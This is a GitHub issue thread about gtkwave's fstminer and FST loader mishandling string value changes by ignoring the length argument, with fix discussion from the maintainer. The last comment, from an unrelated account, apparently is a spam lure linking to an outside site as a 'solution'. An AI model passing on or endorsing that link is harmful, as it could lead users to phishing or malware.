gtkwave/gtkwave #423: fstminer doesn't handle string transitions correctly

rfuest, 2025-04-08:
The `fstminer` doesn't seem to use the `plen` argument in the `value_change_callback_varlen` callback and instead continues to output text until it eventually encounters a `\0`. Here is an example using one of the test files from the `master` branch:
```sh
$ fstminer lib/libgtkwave/test/files/basic.fst
#0 variables.string str-0str-1str-2str-3str-4str-5str-6str-7str-8
#0 variables.real 0.5
#0 variables.integer 00000000000000000000000000000000
#0 variables.vector 00000000
#0 variables.bit 0
#4 variables.one_transition 0
```

The expected output would begin with:
```
#0 variables.string str-0
...
```

rfuest, 2025-04-08:
The FST loader contains a similar issue, which affects the removal of duplicate string values:

[image]

Test file: [duplicate_values.zip](https://github.com/user-attachments/files/19640691/duplicate_values.zip)

Changing this line to use `strncmp(..., plen)` seems to fix the problem: https://github.com/gtkwave/gtkwave/blob/6d759dbd322ce3a26eb9b53533863c59811d658c/gtkwave3-gtk3/src/fst.c#L1558

tbybell, 2025-04-09:
To https://github.com/gtkwave/gtkwave.git
   6d759db..1fec704  lts -> lts

For the fstminer one, I added the equivalent of strnstr which strangely enough exists in BSD, but not linux.  Afterward if the match actually prints something, then I'll do an alloc/null terminate/use/free.

For the fst.c usage...there's a typo where `(const char *)value` is used in the strcmp rather than simply `s`, which is what string is added to the chain of value changes, so it's what should be compared against.  However, your strncmp/plen will work fine as well provided that `#if 0` to force strings to be printable never becomes a `#if 1` in the future.

rfuest, 2025-04-09:
> For the fstminer one, I added the equivalent of strnstr which strangely enough exists in BSD, but not linux. Afterward if the match actually prints something, then I'll do an alloc/null terminate/use/free.

Sounds good, I'll copy the changes to the development branch.

> For the fst.c usage...there's a typo where `(const char *)value` is used in the strcmp rather than simply `s`, which is what string is added to the chain of value changes, so it's what should be [...]

I have removed the commented out section from the development version, because I prefer to keep the data as close as possible to the input file. By replacing the non printable characters at this point any transition, where only the non printable characters change, would be deduplicated. I think it should be the UIs responsibility to remove any problematic characters if necessary.

---

Do you think that the VCD loader should also be updated to remove repeated string changes? There are comparisons for all other types, but not for string changes. The current behaviour makes it inconsistent with the FST loader.

closed 2025-04-18 by rfuest

soborakso, 2025-04-20:
I may I found a solution to your issue. Check it out here [click](https://forreststonesolutions.com/robots/)